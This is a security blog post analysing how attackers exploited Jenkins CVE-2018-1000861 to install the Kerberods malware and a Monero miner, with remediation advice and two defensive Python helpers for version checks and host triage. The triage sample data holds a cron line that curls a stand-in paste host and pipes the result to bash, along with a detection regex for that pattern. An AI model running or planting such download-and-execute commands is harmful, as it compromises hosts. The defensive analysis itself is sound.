Apache Jenkins Exploited to Mine Monero Cryptocurrency

Ezzeldin Tahoun
Published in PwnPizza
May 26, 2019

A malicious campaign is currently in progress to exploit outdated Jenkins installations, allowing attackers to obtain root privileges and mine the Monero cryptocurrency. Details on the attack have been recently made available.

Why is it important?

The importance of the issue comes from the large scale of Jenkins adoption. Jenkins is the leading open source project providing automation tools for continuous integration. It is widely used in the software industry and is currently used by over 26000+ companies[1]. Therefore, this vulnerability can potentially compromise a wide scope of products and services, especially since, upon successful launch of the cryptocurrency miner, the program attempts to spread the attack across the network using local SSH keys[2]. It is also known that the attackers have malicious intent and have the potential to do more harm than simply mine cryptocurrency. Researchers have also found that the vulnerability can be exploited for unauthenticated remote code execution[3].

This issue also highlights the security vulnerabilities and risks inherent in using third-party open source code. The issue (i.e. CVE-2018-1000861) stems from a vulnerability in the web framework named Stapler, which Jenkins uses to handle its HTTP requests[4]. This makes releasing fixes more difficult, since Jenkins developers might not have the flexibility of modifying the Stapler codebase.

Who is affected?

All machines running Jenkins installations with versions up to and including v2.153 are vulnerable to this attack. Jenkins released a security advisory[5] together with the patch for the fix in December 2018, when the issue was discovered[2]. Parties that were slow to update their installations are now the primary targets for the attacker. However, it has now been 6 months since the discovery of the vulnerability; what factors delay developers from updating their installations?
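One way to check an instance against the version threshold above, as an added example that is not code from the post or from the Jenkins project: Jenkins advertises its version in the X-Jenkins response header, and the function below compares it with the cut-off the post gives (weekly builds up to and including 2.153). The LTS threshold (fixed in 2.138.4) is taken from the Jenkins advisory rather than from the post, and the response block is constructed sample data.

```python
"""Classify a Jenkins instance as patched or vulnerable to CVE-2018-1000861
from its X-Jenkins header. Added example, not code from the article."""
import re

# Threshold stated in the post: weekly releases up to and including 2.153
# are affected, so the first fixed weekly release is 2.154.
FIXED_WEEKLY = (2, 154)
# Assumption taken from the Jenkins advisory, not from the post: the LTS
# line (three-component versions) was fixed in 2.138.4.
FIXED_LTS = (2, 138, 4)

# Constructed sample of the headers a Jenkins instance returns.
SAMPLE_HEADERS = """HTTP/1.1 403 Forbidden
X-Jenkins: 2.150
X-Jenkins-Session: 0123abcd
Content-Type: text/html;charset=utf-8
"""


def parse_version(headers: str):
    """Return the version tuple from the X-Jenkins header, or None."""
    m = re.search(r"^X-Jenkins:\s*([0-9][0-9.]*)\s*$", headers, re.M | re.I)
    if not m:
        return None
    return tuple(int(p) for p in m.group(1).rstrip(".").split("."))


def is_vulnerable(version) -> bool:
    """Three components means an LTS build, two means a weekly build."""
    if len(version) == 3:
        return version < FIXED_LTS
    return version[:2] < FIXED_WEEKLY


def assess(headers: str) -> str:
    """Map a raw header block to 'vulnerable', 'patched' or 'unknown'."""
    v = parse_version(headers)
    if v is None:
        return "unknown"
    return "vulnerable" if is_vulnerable(v) else "patched"


if __name__ == "__main__":
    print(assess(SAMPLE_HEADERS))
```

Run it over the header block returned by each instance in an inventory; an instance that hides or strips the header comes back as "unknown" and needs a manual version check.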

What impact might it have on people?

These attacks could eventually make their way to the end-users of the software. Cryptocurrency mining is extremely demanding in terms of CPU and GPU usage and thus might degrade the performance of other processes and applications running on the same machine. An end-user might experience longer than usual response times from servers.

Furthermore, once the attacker gains root privileges, they have the potential to obtain assets like data, passwords or business secrets stored on the system. This can pose a serious privacy concern for businesses and individuals and can translate to huge losses for safety-critical systems.

What were the causes?

The cause lay in the Stapler HTTP request handling framework. Stapler uses a set of naming conventions such that any code element (e.g. a public method) matching the Stapler naming convention could be reached over HTTP. Since these naming conventions closely match common Java style conventions, an attacker can carefully craft a URL to invoke a method that was never meant to be invoked. This exposes a wide range of attacks, such as invalidating all sessions as an unauthenticated user, creating new user objects in memory and manually kicking off instances of jobs (e.g. the ‘AsyncPeriodicWork’ object) within the system[5].

This specific instance of the attack downloads and drops a malware called “Kerberods”. It exploits the vulnerability to curl raw code from Pastebin and pipe it to bash for execution[6]. Kerberods then attempts to gain root access to the system and leverages these privileges to hide and persist itself. It persists through the creation of a cron job (cron is a UNIX utility for time-scheduling jobs). It hides itself by loading a library into the operating system that prevents all users from opening the binary of the crypto miner as well as the binary of the library itself, and it hides network connections to the cryptocurrency mining pool[6]. The malware then installs and runs a Monero cryptocurrency miner on the system, while terminating all other cryptocurrency miners on the machine. Finally, it spreads across the network using local SSH keys to search for other vulnerable systems.

How might similar problems be prevented in the future?

A very practical prevention method would be to regularly update all third-party software and subscribe to their newsletters or, in this case, security advisories. This allows developers to stay informed and to react quickly to security vulnerabilities when they are discovered. Another method of prevention is to look into how the third-party open-source software works and evaluate it for security vulnerabilities, as opposed to treating the dependency as a black box.

Finally, the effects of this vulnerability can be minimized with monitoring tools that detect unknown processes or excessive and abnormal CPU usage. This allows developers to immediately recognize compromised systems, terminate the offending process(es) and work on a fix for the vulnerability. There are also proprietary automated security solutions that can be employed to monitor systems and detect vulnerabilities; one example is the Trend Micro Hybrid Cloud Security solution[2].
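A minimal version of the monitoring described above, as an added example that is not code from the post: it flags processes with abnormal CPU usage or names outside an expected set, and flags cron entries that fetch remote content and pipe it to a shell, which is the persistence and delivery pattern the post attributes to Kerberods. The process allowlist, the ps output and the crontab lines are all constructed for the example.

```python
"""Triage helper for a Jenkins host: abnormal CPU, unexpected process
names, and cron entries that curl/wget into a shell. Added example,
not code from the article; all sample data below is constructed."""
import re

CPU_THRESHOLD = 80.0
# Hypothetical allowlist of processes expected on a Jenkins build host.
EXPECTED = {"java", "sshd", "cron", "systemd", "bash"}

# Constructed output of `ps -eo pid,pcpu,user,comm,args` (not real data).
PS_SAMPLE = """\
  PID %CPU USER     COMMAND         COMMAND
    1  0.0 root     systemd         /sbin/init
  812  0.1 root     sshd            /usr/sbin/sshd -D
 1342 12.4 jenkins  java            java -jar jenkins.war
 2901 97.8 jenkins  svcupd          ./svcupd -o pool.example:3333
"""

# Constructed crontab lines (not real data).
CRON_SAMPLE = """\
*/5 * * * * /usr/local/bin/backup.sh
* * * * * curl -fsSL http://paste.example/raw/x | bash
"""

# Download-and-execute pattern: curl or wget piped into sh/bash.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def suspicious_processes(ps_output: str):
    """Return (pid, name, reasons) for each process worth a closer look."""
    findings = []
    for line in ps_output.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 4)
        if len(parts) < 4:
            continue
        pid, cpu, comm = int(parts[0]), float(parts[1]), parts[3]
        reasons = []
        if cpu >= CPU_THRESHOLD:
            reasons.append("high cpu")
        if comm not in EXPECTED:
            reasons.append("unexpected name")
        if reasons:
            findings.append((pid, comm, reasons))
    return findings


def suspicious_cron(crontab: str):
    """Return crontab lines that fetch remote content into a shell."""
    return [ln for ln in crontab.splitlines() if FETCH_AND_RUN.search(ln)]
```

Because the post notes that the malware loads a library to hide its binaries and network connections, a process listing taken on the host itself may be incomplete; corroborate with CPU and network metrics collected from outside the host.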

It’s clear from this example that third-party open-source dependencies can also pose security risks to an application. However, benefits such as community support, development and maintenance make open source software feasible for commonly used libraries. What are some precautions or steps that developers should take before using open-source software? What are some cases in which open-source software should not be trusted or would be infeasible to implement?

— — — — — — — — — — — —

References:

[1] iDataLabs. Companies using Jenkins. https://idatalabs.com/tech/products/jenkins/

[2] Trend Micro. Jenkins Vulnerability Exploited to Drop Kerberods Malware and Launch Monero Miner. https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/jenkins-vulnerability-exploited-to-drop-kerberods-malware-and-launch-monero-miner

[3] Security Week. Jenkins Vulnerability Exploited to Deliver ‘Kerberods’ Malware. https://www.securityweek.com/jenkins-vulnerability-exploited-deliver-kerberods-malware

[4] Common Vulnerabilities and Exposures (CVE). CVE-2018-1000861. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000861

[5] Jenkins. Jenkins Security Advisory 2018-12-05. https://jenkins.io/security/advisory/2018-12-05/

[6] Marinho, Renato. Vulnerable Apache Jenkins exploited in the wild. https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916/
